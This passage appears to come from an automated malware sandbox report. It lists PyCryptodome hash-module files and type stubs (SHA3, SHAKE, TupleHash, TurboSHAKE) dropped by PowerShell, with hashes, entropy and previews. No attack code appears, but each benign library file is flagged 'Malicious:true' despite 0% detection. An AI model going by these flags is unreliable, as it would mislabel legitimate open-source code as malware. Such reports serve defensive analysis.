                                                                                                                                                                                                                              SHA-256:B804F3AB70381FA5B7140E10F95AB9D95BD62A445BDC7400FCC3DB44869B8AE1
                                                                                                                                                                                                                              SHA-512:30424090DE374504F1CE50FD8DE0BACF9596F15F9E37C57564168E8640E9CA311A85249B1C41C770561524B460A482553A80B73871C0B75ACB91E5822154D7E7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):624
                                                                                                                                                                                                                              Entropy (8bit):4.938042917334959
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3KHRypRyLXFL1AGRT7wDA5ULgRkhDGaLBCs4Ry5Ryn:1REcT32QEXFRAcVzkhqaLB6wy
                                                                                                                                                                                                                              MD5:A889F6824941567ADFBD97E736E360AA
                                                                                                                                                                                                                              SHA1:1C23C5A1FFB1F8D288974D55CE3C5AD2E6DD51BC
                                                                                                                                                                                                                              SHA-256:D328A5327C257ACA3516C7C11B617D30D5E0C7C9915A32F4C6B3DDFE269DCF7F
                                                                                                                                                                                                                              SHA-512:9CCF01936F3174D2EF90CC3B50631282F115D8BF952F4EA2AA4A2F7701C613D9A84DD9FAFB014F01689DDD938E22D258A071DADEBAE83A8376ECEDC6D11279A3
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_384_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_384_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_384_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_384_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_384_Hash: .......digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6305
                                                                                                                                                                                                                              Entropy (8bit):4.697217083867846
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkIlhSvzJEdixIV0xWNbaOMrXXWkHM6n:bQHvwmdibxAe5n3ME
                                                                                                                                                                                                                              MD5:CECF1A897C1A3BB7B1E1D635D4B37A40
                                                                                                                                                                                                                              SHA1:EE9D64CB0C064997FBBFBF9BF8B92C3969AA3CB7
                                                                                                                                                                                                                              SHA-256:14062988382CAE40F806020CE67A33D9726DF2D23DEE63D00A99C592D3F2ACE0
                                                                                                                                                                                                                              SHA-512:132AADB0D736D949AD5BAD8B93ED4C06001D5ED1F01F16DE70007698AE9C743C11A7FBA8A8F2C39A01EF1B69C07B6DECCCA1F633A31BBDAA3431FC963FE26E7F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):624
                                                                                                                                                                                                                              Entropy (8bit):4.9540685583606
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY36WHRypRyLXFL1AGRT7wPWA5AWLgRkhPWGaLBCYW4Ry5Ryn:1REcT36WxQEXFRAcuWAGWmkhPWGaLBVF
                                                                                                                                                                                                                              MD5:8356FEEC109E4373A23F69FC01C115B5
                                                                                                                                                                                                                              SHA1:9825E1FC90E13C9A265835684C57B22C92BD372C
                                                                                                                                                                                                                              SHA-256:5699B054358A0C556096C132C09C8B3052E5EFE815A26EDABC5AD5E896BF8E9C
                                                                                                                                                                                                                              SHA-512:F9612E9C137858ECC00F2F6CB2E6564CEE149A8ED978B5552FA6CD1E89061BF395B37A92351ECB594F0D47ADD925BB53DBC573654A523CEE4E2F2D2789AAE2E5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_512_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_512_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_512_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_512_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_512_Hash: .......digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7924
                                                                                                                                                                                                                              Entropy (8bit):4.535718326603204
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkIpywpIreZOTiHSR2c+tTq0iR7IuqNH93aOMqXXVMrynCaK/WxUvxWy:bQHvjyEIqZOzYTq0iONdKUnYqGgRk
                                                                                                                                                                                                                              MD5:F7EBB8B3E6EC44133C11F5B75F2AC0CF
                                                                                                                                                                                                                              SHA1:4F0230A067019EF92DF555B66D7505BD6229E570
                                                                                                                                                                                                                              SHA-256:F4346FEB42803D175A2B4CB2A45FE82882C426A67A64C12AC1D723268D3E7726
                                                                                                                                                                                                                              SHA-512:B36AF52C1CD4EC732E1C3A7DB556BCCAF400C298416DE241C763153E784D101F11914D42FF1792513B54EDBBA2297BD49A0B2BEC91AC0AC180151C647F341FE0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):644
                                                                                                                                                                                                                              Entropy (8bit):4.856785452609936
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3eRypRyLu1ApJREVwu5YgR4vORNJt0Ry5Ryn:1REcT3OQEWA1EnTcUNYwy
                                                                                                                                                                                                                              MD5:B3762738614E6E1B46387BD0F80C1608
                                                                                                                                                                                                                              SHA1:99293AED186FBBBF4D26C3E3A9198F2969596722
                                                                                                                                                                                                                              SHA-256:BB0E0DF4F3FFFB4A2B9EFE5B674D7407BBD248678B0BF2A44FF0AA07D247DBDA
                                                                                                                                                                                                                              SHA-512:E3B64DDF98F09B098B52AB79D69AF3827A483E4EDA33200B91F87BEB7E37E434D9CB75170635AE509F69D7F328F6B0A9ED258E42410265CE10B263B118C4521A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA512Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self,.. data: Optional[Buffer],.... truncate: Optional[str]) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA512Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA512Hash: .......def new(data: Optional[Buffer] = ...,.. truncate: Optional[str] = ...) -> SHA512Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4890
                                                                                                                                                                                                                              Entropy (8bit):4.812843153997009
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIl+zui+I4w+7nC/Y/slLH3I:4qrskrs9t3q/IwuiFGC/OOLY
                                                                                                                                                                                                                              MD5:6D8138E2212AEA8C9815ABA5BEBD43D9
                                                                                                                                                                                                                              SHA1:62A40C2E67FC652354E9A8B3126E77F9D759A174
                                                                                                                                                                                                                              SHA-256:D4B807F0F64FE07BE95C7A7F40B4D35024C3A05770C942F9B25A8782B9DE90FB
                                                                                                                                                                                                                              SHA-512:66DE5F2B988B9DD0A7D497B6BBBD2920859BC79A529A6200470B6EDB52D36BFEF55A2B51A0146BCC5B08FBDDD9529F9AFCEE1E2E8B86F1731BF6BAF90051484B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):450
                                                                                                                                                                                                                              Entropy (8bit):4.960253129735369
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3wHVXFL1ApJR4QwEh72CX5BgR48OR42:1REcT36XFRA1Nh71m7U1
                                                                                                                                                                                                                              MD5:1D2E126B0EA263236F02A5B62DA5903D
                                                                                                                                                                                                                              SHA1:BCA2F2DC2A69380180FFEACDB276A6CA7FFD2036
                                                                                                                                                                                                                              SHA-256:FCF71DFFB424435A46138D3B0377F30E1DB2AA318600D6DAE7B123DF848D3EA2
                                                                                                                                                                                                                              SHA-512:4B806AABF25A8D9A705E282EB11EE73500BC1CF71A6EBE59A35A732DE1F5CA0D960BAC124059EF85AF9A6E5A2023895D7CDB195A884A8161275D9BE237F0A518
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE128_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE128_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE128_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE128_XOF: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4892
                                                                                                                                                                                                                              Entropy (8bit):4.816809610030539
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIlHzPiPI7+7nC/Y/sl3nbI:4qrskrs9t3q/IZPiyGC/+O3M
                                                                                                                                                                                                                              MD5:0B15BEEE639A9999E98C64F769F9133D
                                                                                                                                                                                                                              SHA1:3D1366E4788CB51E655EC8C76AA3B7DB6FB98DF9
                                                                                                                                                                                                                              SHA-256:3BE322B0801ABA422C870967EC82AF10958F370C944B3E6370EE8C2F7A1E7046
                                                                                                                                                                                                                              SHA-512:B66693BFB0AAAD73F1BCEAE3DA2410EA53B3366734FDAC0985D7B0C0ACDC849BA98C2D9DA1A0C418FD1C9D757D9430C099F847E7E67B48443A3E55228ACFA0E1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):450
                                                                                                                                                                                                                              Entropy (8bit):4.960253129735369
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3gHVXFL1ApJR4QwIh72CX5BgR4gOR4K:1REcT3g1XFRA1Rh71m/UZ
                                                                                                                                                                                                                              MD5:7A030ACE3463C718EAA115B061D5E0CE
                                                                                                                                                                                                                              SHA1:0525426CE1A9ABE207F53E953EA8E272E423D512
                                                                                                                                                                                                                              SHA-256:5FF0C2256DD9F35EB7BF58D07EDC5A27E73173221079006B1AF95D0B114863A4
                                                                                                                                                                                                                              SHA-512:230109D6EAC483A3DFA0E268477D860AF0DB445D89EF5E39B32A9833CC85E8FBD610C88993CABB097A60630620539191A6AC9742DAD3A7FA141600C7AC4603D5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE256_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE256_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE256_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE256_XOF: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4888
                                                                                                                                                                                                                              Entropy (8bit):5.0581555982839435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MMDqrYJALrYJHdt3EHGuIWHEnGLBx9RhHAygOAHbaIfoCIUCP9lVtpCj:Nqrskrs9t3q/ImHhzvfPoj
                                                                                                                                                                                                                              MD5:386FB9A133C912AF07687FA9D1EE193A
                                                                                                                                                                                                                              SHA1:FCA1900C47A573551C1EE74694CB0D374C7B20C7
                                                                                                                                                                                                                              SHA-256:36051EA4794AA6687E689974F315CE9CE9620EC1F9B1AB4C2F0F9C8099D87BBF
                                                                                                                                                                                                                              SHA-512:1A92C554CABE3DBF6A013E685D6FB919B47A39BF2429795CA87CEC1C15405F386644F141B79923B6B79833E15ABBA02A211FA939CBB0749888ACBD304AB2AE45
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):688
                                                                                                                                                                                                                              Entropy (8bit):4.533807558794474
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBzRo8seUvIY39cHRyD1AQ0dWRFwiOtC5J3r3/V039WgtcP33/RM33dWgtW:1REEyNT39oIAvdWtrj/VGif/qns
                                                                                                                                                                                                                              MD5:19A89FFFB5E19D2A439870AA97B56DF2
                                                                                                                                                                                                                              SHA1:32377BCB0660A03F28324C68EF03E94D0239A1DD
                                                                                                                                                                                                                              SHA-256:B5671E5E8FC4513C2E0C9F072C1A9C868656F0CD66783DC011FC4556C1BD2306
                                                                                                                                                                                                                              SHA-512:466932A02E76056468E12E1984DD3EA0DE44A3544DEA95F19723BE2EBBD9887D177AB7B3F75BAAA74E74D154C396DA468AA8F5492917599154EAEF04F3546B19
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Any, Union, List, Tuple..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class TupleHash(object):.. digest_size: int.. def __init__(self,.... custom: bytes,.. cshake: ModuleType,.. digest_size: int) -> None: ..... def update(self, *data: Buffer) -> TupleHash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,... digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .......def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2902
                                                                                                                                                                                                                              Entropy (8bit):5.194127497375906
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2H9useGoCWxVGpYPGQ2IlstzSiwtpCj:MMDqrYJALrYJHdt3EHGuIWHdroCIUCPG
                                                                                                                                                                                                                              MD5:CA7F63F5DC1A1059E168A5580E88B78B
                                                                                                                                                                                                                              SHA1:4064F740C7E09083F8CF354BB24A56778D83D6A4
                                                                                                                                                                                                                              SHA-256:96BB2970B54CC270DE193FB71155AFFBF54F9ACF21310AC4AD968893A478B3DF
                                                                                                                                                                                                                              SHA-512:C259EF33FB4747529BF9496E3E78B9548279FDAE9BFE2E318FF8A7BFE13815500CBF4A31887A89D9DE21FFBB83897DCAC5F43AAA62C675A1A7473600B439BCCF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):4.609062935971047
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1Lx7/NULQk8xNovSyrzcAiwZJysFTMCAW6wWfFKRiZJyFrIftZMFySJINfFDy:1Lx7/NULQXNoFrzcAx3ysRMhwWfsRi3s
                                                                                                                                                                                                                              MD5:0C079EDD19DA6729069C7098599200CD
                                                                                                                                                                                                                              SHA1:31985EE067F54DFCA6F334621CA9018D2A61DA15
                                                                                                                                                                                                                              SHA-256:0B014A808207E4C2A6375DFD6ADE40C97B5802C8F9EA76748F333C1386C6704C
                                                                                                                                                                                                                              SHA-512:5DFC7A622B54993F74F2848B595FDFCB33B63E43EDE31D384D4A635B179030EFC1222545607C8B816B90AC6FB273B8937B135F42B95AEB08AB906CF899027EB4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from .TupleHash128 import TupleHash....def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3947
                                                                                                                                                                                                                              Entropy (8bit):4.323340706359232
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+IlTHsKL8yk4PiQIXA+7nC/YlPAsAugmSfNZPqjp:bdiAGC/qAVAd
                                                                                                                                                                                                                              MD5:B786224B4B79C69778DB52AC58F83E63
                                                                                                                                                                                                                              SHA1:B2CCDF0809F838CFFF9C26D07857A01FE2F5AB8A
                                                                                                                                                                                                                              SHA-256:512A0D196EFEDAB1E320041D54BFFBF7366C4D35EA95D7290732DB1FD8A946EA
                                                                                                                                                                                                                              SHA-512:EA77F39AAC1E3EAB9966F45693591FE8F696929858D89329CB84B54D0C590A431C548188B003DF04DF513C3F33AFA2E67B30932CE5E981EF00A1B6B9D429BAD0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from Crypto.Util._raw_api import (VoidPointer, SmartPointer,.. create_string_buffer,.. get_raw_buffer, c_size_t,.. c_uint8_ptr, c_ubyte)....from Crypto.Util.number import long_to_bytes..from Crypto.Util.py3compat import bchr....from .keccak import _raw_keccak_lib......class TurboSHAKE(object):.. """A TurboSHAKE hash object... Do not instantiate directly... Use the :func:`new` function... """.... def __init__(self, capacity, domain_separation, data):.... state = VoidPointer().. result = _raw_keccak_lib.keccak_init(state.address_of(),.. c_size_t(capacity),.. c_ubyte(12)) # Reduced number of rounds.. if result:.. raise ValueError("Error %d while instantiating TurboSHAKE".. % result).. self._state = SmartPointer(state.get()
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):591
                                                                                                                                                                                                                              Entropy (8bit):5.065116097079714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBlRE1B9YplvIY39fIL1AzvQ1aEeEWmodFwIiRh72CX5BgRE3GH1dmF:1REOC1bClT39fIRAqYi6LiRh71mEc1dA
                                                                                                                                                                                                                              MD5:B0223AB14FDA42D6811F55259F9BE663
                                                                                                                                                                                                                              SHA1:409E32782D3A86B66CEBABFA703D72BD682C069A
                                                                                                                                                                                                                              SHA-256:B7617049D0B2131180EA0B73AE8CAC73839A27D394BE6B4D9796F9D0198DE6B7
                                                                                                                                                                                                                              SHA-512:4A1180FD51BFE2A50EB344A19EFB954C5071218C169F14AC7A86D72BC45B946A35E7CDC4A06E616A20948F235D501AD24B113F2B9ABF56D68F4100F0C2DE8410
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union, Optional..from typing_extensions import TypedDict, Unpack, NotRequired....Buffer = Union[bytes, bytearray, memoryview]....class TurboSHAKE(object):.... def __init__(self, capacity: int, domain_separation: int, data: Union[Buffer, None]) -> None: ..... def update(self, data: Buffer) -> TurboSHAKE : ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer]=None) -> TurboSHAKE: .......class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
